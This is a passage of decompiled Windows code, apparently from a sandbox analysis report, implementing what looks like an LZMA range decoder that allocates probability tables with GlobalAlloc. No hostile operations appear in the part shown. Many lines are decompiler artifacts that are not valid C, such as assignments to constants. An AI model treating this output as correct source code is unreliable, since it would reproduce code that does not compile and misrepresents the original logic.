                                                          								_t484 = _t644 - 0x70;
                                                          								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                          								goto L148;
                                                          							}
                                                          							L155:
                                                          							_t537 =  *(_t644 - 0x7c);
                                                          							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                          							while(1) {
                                                          								L140:
                                                          								 *(_t644 - 0x88) = _t537;
                                                          								while(1) {
                                                          									L1:
                                                          									_t538 =  *(_t644 - 0x88);
                                                          									if(_t538 > 0x1c) {
                                                          										break;
                                                          									}
                                                          									L2:
                                                          									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                                          										case 0:
                                                          											L3:
                                                          											if( *(_t644 - 0x6c) == 0) {
                                                          												goto L170;
                                                          											}
                                                          											L4:
                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                          											_t538 =  *( *(_t644 - 0x70));
                                                          											if(_t538 > 0xe1) {
                                                          												goto L171;
                                                          											}
                                                          											L5:
                                                          											_t542 = _t538 & 0x000000ff;
                                                          											_push(0x2d);
                                                          											asm("cdq");
                                                          											_pop(_t581);
                                                          											_push(9);
                                                          											_pop(_t582);
                                                          											_t638 = _t542 / _t581;
                                                          											_t544 = _t542 % _t581 & 0x000000ff;
                                                          											asm("cdq");
                                                          											_t633 = _t544 % _t582 & 0x000000ff;
                                                          											 *(_t644 - 0x3c) = _t633;
                                                          											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                          											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                          											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                          											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                          												L10:
                                                          												if(_t641 == 0) {
                                                          													L12:
                                                          													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                          													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                          													goto L15;
                                                          												} else {
                                                          													goto L11;
                                                          												}
                                                          												do {
                                                          													L11:
                                                          													_t641 = _t641 - 1;
                                                          													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                          												} while (_t641 != 0);
                                                          												goto L12;
                                                          											}
                                                          											L6:
                                                          											if( *(_t644 - 4) != 0) {
                                                          												GlobalFree( *(_t644 - 4));
                                                          											}
                                                          											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                          											 *(_t644 - 4) = _t538;
                                                          											if(_t538 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                          												goto L10;
                                                          											}
                                                          										case 1:
                                                          											L13:
                                                          											__eflags =  *(_t644 - 0x6c);
                                                          											if( *(_t644 - 0x6c) == 0) {
                                                          												L157:
                                                          												 *(_t644 - 0x88) = 1;
                                                          												goto L170;
                                                          											}
                                                          											L14:
                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                          											_t45 = _t644 - 0x48;
                                                          											 *_t45 =  *(_t644 - 0x48) + 1;
                                                          											__eflags =  *_t45;
                                                          											L15:
                                                          											if( *(_t644 - 0x48) < 4) {
                                                          												goto L13;
                                                          											}
                                                          											L16:
                                                          											_t550 =  *(_t644 - 0x40);
                                                          											if(_t550 ==  *(_t644 - 0x74)) {
                                                          												L20:
                                                          												 *(_t644 - 0x48) = 5;
                                                          												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                          												goto L23;
                                                          											}
                                                          											L17:
                                                          											 *(_t644 - 0x74) = _t550;
                                                          											if( *(_t644 - 8) != 0) {
                                                          												GlobalFree( *(_t644 - 8));
                                                          											}
                                                          											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                          											 *(_t644 - 8) = _t538;
                                                          											if(_t538 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												goto L20;
                                                          											}
                                                          										case 2:
                                                          											L24:
                                                          											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                          											 *(_t644 - 0x84) = 6;
                                                          											 *(_t644 - 0x4c) = _t557;
                                                          											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                          											goto L132;
                                                          										case 3:
                                                          											L21:
                                                          											__eflags =  *(_t644 - 0x6c);
                                                          											if( *(_t644 - 0x6c) == 0) {
                                                          												L158:
                                                          												 *(_t644 - 0x88) = 3;
                                                          												goto L170;
                                                          											}
                                                          											L22:
                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          											_t67 = _t644 - 0x70;
                                                          											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                          											__eflags =  *_t67;
                                                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                          											L23:
                                                          											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                          											if( *(_t644 - 0x48) != 0) {
                                                          												goto L21;
                                                          											}
                                                          											goto L24;
                                                          										case 4:
                                                          											L133:
                                                          											_t559 =  *_t642;
                                                          											_t626 = _t559 & 0x0000ffff;
                                                          											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                          											if( *(_t644 - 0xc) >= _t596) {
                                                          												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                          												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                          												 *(_t644 - 0x40) = 1;
                                                          												_t560 = _t559 - (_t559 >> 5);
                                                          												__eflags = _t560;
                                                          												 *_t642 = _t560;
                                                          											} else {
                                                          												 *(_t644 - 0x10) = _t596;
                                                          												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                          												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                          											}
                                                          											if( *(_t644 - 0x10) >= 0x1000000) {
                                                          												goto L139;
                                                          											} else {
                                                          												goto L137;
                                                          											}
                                                          										case 5:
                                                          											L137:
                                                          											if( *(_t644 - 0x6c) == 0) {
                                                          												L168:
                                                          												 *(_t644 - 0x88) = 5;
                                                          												goto L170;
                                                          											}
                                                          											L138:
                                                          											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                          											L139:
                                                          											_t537 =  *(_t644 - 0x84);
                                                          											L140:
                                                          											 *(_t644 - 0x88) = _t537;
                                                          											goto L1;
                                                          										case 6:
                                                          											L25:
                                                          											__edx = 0;
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												L36:
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) = 1;
                                                          												 *(__ebp - 0x84) = 7;
                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          												goto L132;
                                                          											}
                                                          											L26:
                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          											__esi =  *(__ebp - 0x60);
                                                          											__cl = 8;
                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          											__ecx =  *(__ebp - 0x3c);
                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          											__ecx =  *(__ebp - 4);
                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											if( *(__ebp - 0x38) >= 4) {
                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                          													_t98 = __ebp - 0x38;
                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                          													__eflags =  *_t98;
                                                          												} else {
                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          												}
                                                          											} else {
                                                          												 *(__ebp - 0x38) = 0;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                          											if( *(__ebp - 0x34) == __edx) {
                                                          												L35:
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												goto L61;
                                                          											} else {
                                                          												L32:
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__ecx =  *(__ebp - 8);
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          												goto L41;
                                                          											}
                                                          										case 7:
                                                          											L66:
                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                          											if( *(__ebp - 0x40) != 1) {
                                                          												L68:
                                                          												__eax =  *(__ebp - 0x24);
                                                          												 *(__ebp - 0x80) = 0x16;
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          												__eax =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                          												__eflags = __eax;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L69;
                                                          											}
                                                          											L67:
                                                          											__eax =  *(__ebp - 4);
                                                          											__ecx =  *(__ebp - 0x38);
                                                          											 *(__ebp - 0x84) = 8;
                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          											goto L132;
                                                          										case 8:
                                                          											L70:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xa;
                                                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x38);
                                                          												__ecx =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 0x38) + 0xf;
                                                          												 *(__ebp - 0x84) = 9;
                                                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          											}
                                                          											goto L132;
                                                          										case 9:
                                                          											L73:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												goto L90;
                                                          											}
                                                          											L74:
                                                          											__eflags =  *(__ebp - 0x60);
                                                          											if( *(__ebp - 0x60) == 0) {
                                                          												goto L171;
                                                          											}
                                                          											L75:
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                          											__eflags = _t259;
                                                          											0 | _t259 = _t259 + _t259 + 9;
                                                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                          											goto L76;
                                                          										case 0xa:
                                                          											L82:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												L84:
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xb;
                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          												goto L132;
                                                          											}
                                                          											L83:
                                                          											__eax =  *(__ebp - 0x28);
                                                          											goto L89;
                                                          										case 0xb:
                                                          											L85:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__ecx =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x20);
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x24);
                                                          											}
                                                          											__ecx =  *(__ebp - 0x28);
                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          											L89:
                                                          											__ecx =  *(__ebp - 0x2c);
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          											L90:
                                                          											__eax =  *(__ebp - 4);
                                                          											 *(__ebp - 0x80) = 0x15;
                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          											goto L69;
                                                          										case 0xc:
                                                          											L99:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L164:
                                                          												 *(__ebp - 0x88) = 0xc;
                                                          												goto L170;
                                                          											}
                                                          											L100:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t334 = __ebp - 0x70;
                                                          											 *_t334 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t334;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											goto L101;
                                                          										case 0xd:
                                                          											L37:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L159:
                                                          												 *(__ebp - 0x88) = 0xd;
                                                          												goto L170;
                                                          											}
                                                          											L38:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t122 = __ebp - 0x70;
                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t122;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L39:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          												goto L48;
                                                          											}
                                                          											L40:
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												goto L54;
                                                          											}
                                                          											L41:
                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          											 *(__ebp - 0x48) = __eax;
                                                          											__eax = __eax + 1;
                                                          											__eax = __eax << 8;
                                                          											__eax = __eax + __ebx;
                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edx = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												 *(__ebp - 0x40) = 1;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												__ebx = __ebx + __ebx + 1;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edx;
                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L39;
                                                          											} else {
                                                          												L45:
                                                          												goto L37;
                                                          											}
                                                          										case 0xe:
                                                          											L46:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L160:
                                                          												 *(__ebp - 0x88) = 0xe;
                                                          												goto L170;
                                                          											}
                                                          											L47:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t156 = __ebp - 0x70;
                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t156;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											while(1) {
                                                          												L48:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													break;
                                                          												}
                                                          												L49:
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t170 = __edx + 1; // 0x1
                                                          													__ebx = _t170;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													continue;
                                                          												} else {
                                                          													L53:
                                                          													goto L46;
                                                          												}
                                                          											}
                                                          											L54:
                                                          											_t173 = __ebp - 0x34;
                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          											__eflags =  *_t173;
                                                          											goto L55;
                                                          										case 0xf:
                                                          											L58:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L161:
                                                          												 *(__ebp - 0x88) = 0xf;
                                                          												goto L170;
                                                          											}
                                                          											L59:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t203 = __ebp - 0x70;
                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t203;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L60:
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												L55:
                                                          												__al =  *(__ebp - 0x44);
                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          												goto L56;
                                                          											}
                                                          											L61:
                                                          											__eax =  *(__ebp - 0x58);
                                                          											__edx = __ebx + __ebx;
                                                          											__ecx =  *(__ebp - 0x10);
                                                          											__esi = __edx + __eax;
                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edi = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												_t217 = __edx + 1; // 0x1
                                                          												__ebx = _t217;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edi;
                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L60;
                                                          											} else {
                                                          												L65:
                                                          												goto L58;
                                                          											}
                                                          										case 0x10:
                                                          											L109:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L165:
                                                          												 *(__ebp - 0x88) = 0x10;
                                                          												goto L170;
                                                          											}
                                                          											L110:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t365 = __ebp - 0x70;
                                                          											 *_t365 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t365;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											goto L111;
                                                          										case 0x11:
                                                          											L69:
                                                          											__esi =  *(__ebp - 0x58);
                                                          											 *(__ebp - 0x84) = 0x12;
                                                          											goto L132;
                                                          										case 0x12:
                                                          											L128:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												L131:
                                                          												__eax =  *(__ebp - 0x58);
                                                          												 *(__ebp - 0x84) = 0x13;
                                                          												__esi =  *(__ebp - 0x58) + 2;
                                                          												L132:
                                                          												 *(_t644 - 0x54) = _t642;
                                                          												goto L133;
                                                          											}
                                                          											L129:
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											__eflags = __eax;
                                                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          											goto L130;
                                                          										case 0x13:
                                                          											L141:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												L143:
                                                          												_t469 = __ebp - 0x58;
                                                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          												__eflags =  *_t469;
                                                          												 *(__ebp - 0x30) = 0x10;
                                                          												 *(__ebp - 0x40) = 8;
                                                          												L144:
                                                          												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                          												L145:
                                                          												 *(_t644 - 0x50) = 1;
                                                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                          												goto L149;
                                                          											}
                                                          											L142:
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											 *(__ebp - 0x30) = 8;
                                                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          											L130:
                                                          											 *(__ebp - 0x58) = __eax;
                                                          											 *(__ebp - 0x40) = 3;
                                                          											goto L144;
                                                          										case 0x14:
                                                          											L156:
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          											__eax =  *(__ebp - 0x80);
                                                          											while(1) {
                                                          												L140:
                                                          												 *(_t644 - 0x88) = _t537;
                                                          												goto L1;
                                                          											}
                                                          										case 0x15:
                                                          											L91:
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          											__al = __al & 0x000000fd;
                                                          											__eax = (__eflags >= 0) - 1 + 0xb;
                                                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          											goto L120;
                                                          										case 0x16:
                                                          											goto L0;
                                                          										case 0x17:
                                                          											while(1) {
                                                          												L145:
                                                          												 *(_t644 - 0x50) = 1;
                                                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                          												goto L149;
                                                          											}
                                                          										case 0x18:
                                                          											goto L146;
                                                          										case 0x19:
                                                          											L94:
                                                          											__eflags = __ebx - 4;
                                                          											if(__ebx < 4) {
                                                          												L98:
                                                          												 *(__ebp - 0x2c) = __ebx;
                                                          												L119:
                                                          												_t393 = __ebp - 0x2c;
                                                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          												__eflags =  *_t393;
                                                          												L120:
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													L166:
